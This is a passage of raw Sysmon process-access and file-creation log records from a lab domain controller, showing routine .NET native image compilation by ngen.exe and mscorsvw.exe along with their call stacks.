4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:02.028{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fc8-0\CustomMarshalers.dll2021-01-18 13:49:02.028 10341000x80000000000000007445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:03.793{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CF-6005-2903-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:03.793{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CF-6005-2903-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:03.793{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CF-6005-2903-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:03.684{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1398-0\System.Xaml.dll2021-01-18 13:49:03.684 10341000x80000000000000007448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:04.090{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:04.074{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:04.074{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.777{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.762{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.762{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.668{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2D03-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.652{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2D03-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.652{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2D03-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:06.590{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\484-0\System.Net.Http.dll2021-01-18 13:49:06.590 10341000x80000000000000007455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.324{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.309{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.309{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.199{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2B03-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.184{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2B03-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:06.184{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2B03-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:06.027{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a20-0\WindowsBase.dll2021-01-18 13:49:06.027 10341000x80000000000000007469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:07.590{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.574{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:07.574{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
